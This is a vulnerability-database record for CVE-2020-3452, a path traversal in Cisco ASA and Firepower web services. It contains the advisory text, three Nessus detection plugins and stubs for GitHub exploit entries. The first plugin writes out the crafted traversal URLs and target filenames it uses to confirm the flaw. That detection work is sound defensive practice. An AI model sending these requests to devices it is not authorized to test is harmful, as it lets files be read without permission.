A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.
{"nessus": [{"lastseen": "2023-01-11T15:17:39", "description": "A vulnerability exists in the web services interface of Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) Software. An unauthenticated, remote attacker can exploit this, by sending a crafted HTTP request containing directory traversal character sequences to an affected device, in order to read sensitive files on the targeted system.\n\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-07-29T00:00:00", "type": "nessus", "title": "Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software Web Services Read-Only Path Traversal (cisco-sa-asaftd-ro-path-KJuQhB86)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:cisco:adaptive_security_appliance_software", "cpe:/a:cisco:firepower_threat_defense"], "id": "CISCO-SA-ASAFTD-RO-PATH-KJUQHB86_DIRECT.NASL", "href": "https://www.tenable.com/plugins/nessus/139064", "sourceData": "#TRUSTED 
\n#TRUST-RSA-SHA256 \n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139064);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-3452\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvt03598\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-asaftd-ro-path-KJuQhB86\");\n script_xref(name:\"IAVA\", value:\"2020-A-0338-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0060\");\n\n script_name(english:\"Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software Web Services Read-Only Path Traversal (cisco-sa-asaftd-ro-path-KJuQhB86)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch\");\n script_set_attribute(attribute:\"description\", value:\n\"A vulnerability exists in the web services interface of Cisco Adaptive Security Appliance (ASA) and Firepower Threat\nDefense (FTD) Software. 
An unauthenticated, remote attacker can exploit this, by sending a crafted HTTP request\ncontaining directory traversal character sequences to an affected device, in order to read sensitive files on the\ntargeted system.\n\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3f081787\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvt03598\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in the Cisco Security Advisory\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-3452\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:adaptive_security_appliance_software\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:firepower_threat_defense\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 443);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('spad_log_func.inc');\ninclude('ssl_funcs.inc');\n\nfunction is_vuln(item)\n{\n local_var res, req;\n\n res = http_send_recv3(\n method:'GET',\n port: port,\n item:item,\n follow_redirect: 1,\n transport:transport\n );\n\n req = http_last_sent_request();\n spad_log(message:'\\n' +\n '---------------------' + '\\n' + \n 'Request:\\n' + req + '\\n' + \n 'Response Code: ' + res[0] + '\\n' +\n 'Response Body:\\n' + res[2] + '\\n\\n'\n );\n\n if (empty_or_null(res))\n audit(AUDIT_RESP_NOT, port);\n\n if ('200' >< res[0] && 'Cisco' >< res[2] && 'Copyright' >< res[2] && 'dofile' >< res[2])\n {\n report += 'It was possible to retrieve the contents of ' + file + ' using the following request:\\n' + req;\n return TRUE;\n }\n return FALSE;\n}\n\nvar port = get_http_port(default:443, embedded:TRUE);\nvar transport = ssl_transport(ssl:TRUE, verify:FALSE);\nvar files = make_list(\n 'logo.gif',\n 'http_auth.html',\n 'user_dialog.html',\n 'localization_inc.lua',\n 'portal_inc.lua',\n 'include',\n 'nostcaccess.html',\n 'ask.html',\n 'no_svc.html',\n 'svc.html',\n 'session.js',\n 'useralert.html',\n 'ping.html',\n 'help',\n 'app_index.html',\n 'tlbr',\n 'portal_forms.js',\n 'logon_forms.js',\n 'win.js',\n 'portal.css',\n 'portal.js',\n 'sess_update.html',\n 'blank.html',\n 'noportal.html',\n 'portal_ce.html',\n 'portal.html',\n 'home',\n 'logon_custom.css',\n 'portal_custom.css',\n 'preview.html',\n 'session_expired',\n 'custom',\n 'portal_elements.html',\n 'commonspawn.js',\n 'common.js',\n 'appstart.js',\n 'appstatus',\n 'relaymonjar.html',\n 'relaymonocx.html',\n 'relayjar.html',\n 'relayocx.html',\n 'portal_img',\n 'color_picker.js',\n 
'color_picker.html',\n 'cedhelp.html',\n 'cedmain.html',\n 'cedlogon.html',\n 'cedportal.html',\n 'cedsave.html',\n 'cedf.html',\n 'ced.html',\n 'lced.html',\n 'files',\n '041235123432C2',\n '041235123432U2',\n 'pluginlib.js',\n 'shshim',\n 'do_url',\n 'clear_cache',\n 'connection_failed_form',\n 'apcf',\n 'ucte_forbidden_data',\n 'ucte_forbidden_url',\n 'cookie',\n 'session_password.html',\n 'tunnel_linux.jnlp',\n 'tunnel_mac.jnlp',\n 'sdesktop',\n 'gp-gip.html',\n 'auth.html',\n 'wrong_url.html',\n 'logon_redirect.html',\n 'logout.html',\n 'logon.html',\n 'test_chargen',\n 'posturl.html'\n );\n \nvar report = '';\n\nvar file, vuln;\n\nforeach file (files)\n {\n # Check first endpoint\n vuln = is_vuln(\n item:'/+CSCOT+/translation-table?type=mst&textdomain=%2bCSCOE%2b/' + file + '&default-language&lang=../'\n );\n\n if (vuln) break;\n\n # Check second endpoint\n if (!vuln)\n {\n vuln = is_vuln(\n item:'/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/' + file\n );\n if (vuln) break;\n }\n }\n\nif (!vuln)\n audit(AUDIT_HOST_NOT, 'affected');\n\nsecurity_report_v4(\n port:port,\n severity:SECURITY_WARNING,\n extra:report\n);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T15:17:40", "description": "A vulnerability exists in the web services interface of Cisco Firepower Threat Defense (FTD) Software. 
An unauthenticated, remote attacker can exploit this, by sending a crafted HTTP request containing directory traversal character sequences to an affected device, in order to read sensitive files on the targeted system.\n\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-07-24T00:00:00", "type": "nessus", "title": "Cisco Firepower Threat Defense Software Web Services Read-Only Path Traversal (cisco-sa-asaftd-ro-path-KJuQhB86)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:cisco:firepower_threat_defense"], "id": "CISCO-SA-ASAFTD-RO-PATH-KJUQHB86-FTD.NASL", "href": "https://www.tenable.com/plugins/nessus/138895", "sourceData": "#TRUSTED \n#TRUST-RSA-SHA256 
\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138895);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-3452\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvt03598\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-asaftd-ro-path-KJuQhB86\");\n script_xref(name:\"IAVA\", value:\"2020-A-0338-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0060\");\n\n script_name(english:\"Cisco Firepower Threat Defense Software Web Services Read-Only Path Traversal (cisco-sa-asaftd-ro-path-KJuQhB86)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch\");\n script_set_attribute(attribute:\"description\", value:\n\"A vulnerability exists in the web services interface of Cisco 
Firepower Threat Defense (FTD) Software. An\nunauthenticated, remote attacker can exploit this, by sending a crafted HTTP request containing directory traversal\ncharacter sequences to an affected device, in order to read sensitive files on the targeted system.\n\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3f081787\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvt03598\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in the Cisco Security Advisory\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-3452\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:firepower_threat_defense\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_enumerate_firepower.nbin\");\n script_require_keys(\"installed_sw/Cisco Firepower Threat Defense\", \"Host/Cisco/Firepower\");\n\n exit(0);\n}\n\ninclude('cisco_workarounds.inc');\ninclude('ccf.inc');\n\nproduct_info = cisco::get_product_info(name:'Cisco Firepower Threat Defense');\n\nvuln_ranges = [\n {'min_ver' : '6.2.2', 'fix_ver': '6.2.3.16'},\n {'min_ver' : '6.3.0', 'fix_ver': '6.3.0.6'},\n {'min_ver' : '6.4.0', 'fix_ver': '6.4.0.10'},\n {'min_ver' : '6.5.0', 'fix_ver': '6.5.0.5'},\n {'min_ver' : '6.6.0', 'fix_ver': '6.6.0.1'},\n];\n\n# Indicates that we've authenticated to an FTD CLI. Required for workaround check, set in\n# ssh_get_info2_cisco_firepower.inc. This should always be present.\nis_ftd_cli = get_kb_item_or_exit(\"Host/Cisco/Firepower/is_ftd_cli\");\n# Indicates that we've successfully run \"rpm -qa --last\" in expert mode to get the list of applied hotfixes. \nexpert = get_kb_item(\"Host/Cisco/FTD_CLI/1/expert\");\n\n# This plugin needs both a workaround and hotfix check. 
If we can't check either of them, require paranoia to run.\nif (!is_ftd_cli || !expert)\n{\n if (report_paranoia < 2)\n audit(AUDIT_PARANOID);\n}\n\n# Don't set workarounds or hotfixes if we can't check for these.\nif (!is_ftd_cli)\n{\n workarounds = make_list();\n extra = 'Note that Nessus was unable to check for workarounds or hotfixes';\n}\nelse\n{\n # Workarounds can be checked with just the FTD CLI\n workarounds = make_list(CISCO_WORKAROUNDS['anyconnect_client_services'], CISCO_WORKAROUNDS['ssl_vpn']);\n cmds = make_list('show running-config');\n # To check hotfixes, Host/Cisco/FTD_CLI/1/expert should be set to 1\n if (expert)\n {\n hotfixes['6.3.0'] = {'hotfix' : 'Hotfix_AV-6.3.0.6-3', 'ver_compare' : FALSE};\n hotfixes['6.4.0'] = {'hotfix' : 'Hotfix_BM-6.4.0.10-2', 'ver_compare' : FALSE};\n hotfixes['6.5.0'] = {'hotfix' : 'Hotfix_O-6.5.0.5-3', 'ver_compare' : FALSE};\n }\n else\n extra = 'Note that Nessus was unable to check for hotfixes';\n}\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_WARNING,\n 'version' , product_info['version'],\n 'bug_id' , 'CSCvt03598',\n 'fix' , 'See vendor advisory',\n 'extra' , extra\n);\n\nif (max_index(cmds) > 0)\n reporting['cmds'] = cmds;\n\ncisco::check_and_report(\n product_info:product_info,\n reporting:reporting,\n vuln_ranges:vuln_ranges,\n workarounds:workarounds,\n firepower_hotfixes:hotfixes\n);\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T15:15:58", "description": "A vulnerability exists in the web services interface of Cisco Adaptive Security Appliance (ASA) Software. 
An unauthenticated, remote attacker can exploit this, by sending a crafted HTTP request containing directory traversal character sequences to an affected device, in order to read sensitive files on the targeted system.\n\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-07-24T00:00:00", "type": "nessus", "title": "Cisco Adaptive Security Appliance Software Web Services Read-Only Path Traversal (cisco-sa-asaftd-ro-path-KJuQhB86)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:cisco:adaptive_security_appliance_software"], "id": "CISCO-SA-ASAFTD-RO-PATH-KJUQHB86-ASA.NASL", "href": "https://www.tenable.com/plugins/nessus/138894", "sourceData": "#TRUSTED 
\n#TRUST-RSA-SHA256 \n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138894);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-3452\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvt03598\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-asaftd-ro-path-KJuQhB86\");\n script_xref(name:\"IAVA\", value:\"2020-A-0338-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0060\");\n\n script_name(english:\"Cisco Adaptive Security Appliance Software Web Services Read-Only Path Traversal (cisco-sa-asaftd-ro-path-KJuQhB86)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch\");\n 
script_set_attribute(attribute:\"description\", value:\n\"A vulnerability exists in the web services interface of Cisco Adaptive Security Appliance (ASA) Software. An\nunauthenticated, remote attacker can exploit this, by sending a crafted HTTP request containing directory traversal\ncharacter sequences to an affected device, in order to read sensitive files on the targeted system.\n\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3f081787\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvt03598\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in the Cisco Security Advisory\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-3452\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:cisco:adaptive_security_appliance_software\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"Host/Cisco/ASA\");\n\n exit(0);\n}\ninclude('ccf.inc');\ninclude('cisco_workarounds.inc');\n\nproduct_info = cisco::get_product_info(name:'Cisco Adaptive Security Appliance (ASA) Software');\n\nvuln_ranges = [\n {'min_ver' : '0.0', 'fix_ver' : '9.6.4.42'},\n {'min_ver' : '9.7', 'fix_ver' : '9.8.4.20'},\n {'min_ver' : '9.9', 'fix_ver' : '9.9.2.74'},\n {'min_ver' : '9.10', 'fix_ver' : '9.10.1.42'},\n {'min_ver' : '9.12', 'fix_ver' : '9.12.3.12'},\n {'min_ver' : '9.13', 'fix_ver' : '9.13.1.10'},\n {'min_ver' : '9.14', 'fix_ver' : '9.14.1.10'},\n];\n\nworkarounds = make_list(CISCO_WORKAROUNDS['anyconnect_client_services'], CISCO_WORKAROUNDS['ssl_vpn']);\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_WARNING,\n 'version' , product_info['version'],\n 'bug_id' , 'CSCvt03598',\n 'cmds' , make_list('show running_config')\n);\n\ncisco::check_and_report(\n product_info:product_info,\n workarounds:workarounds,\n reporting:reporting,\n vuln_ranges:vuln_ranges\n);\n\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "githubexploit": [{"lastseen": "2022-03-23T23:39:21", "description": "# cve-2020-3452\nunauth file read in cisco a...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": 
"3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-07-24T05:56:32", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Cisco Adaptive Security Appliance", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2021-08-14T01:56:21", "id": "DF54BC36-EFA5-5EC6-9E17-01ECF18FD53C", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:44:43", "description": "<b>[CVE-2020-3452] Cisco Adaptive Security Appliance (ASA) & Cis...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-08-13T08:22:27", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Cisco Adaptive Security Appliance", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": 
"AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2022-01-14T05:31:19", "id": "9F6806F4-97B7-5885-AE3E-250F6127D80C", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-03-23T18:06:34", "description": "# Cisco-CVE-2020-3452-checker\nsimple bash script of Cisco CVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-02-04T16:50:27", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Cisco Adaptive Security Appliance", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2021-12-16T09:46:15", "id": "E6138420-77EE-5F9C-A97D-2A839DEB4073", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-07-07T00:38:22", "description": "# CISCO CVE-2020-3452 Scanner & Exploiter\n\nIt will scan the targ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-01-05T14:41:13", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Cisco Adaptive Security Appliance", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2022-07-06T23:37:38", "id": "C63DDE2A-5910-5413-9A56-03799666EA88", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-07-06T16:17:58", "description": "# Cisco Adaptive Security Appliance Software and Firepower Threa...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-02-03T05:45:53", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Cisco Adaptive Security Appliance", 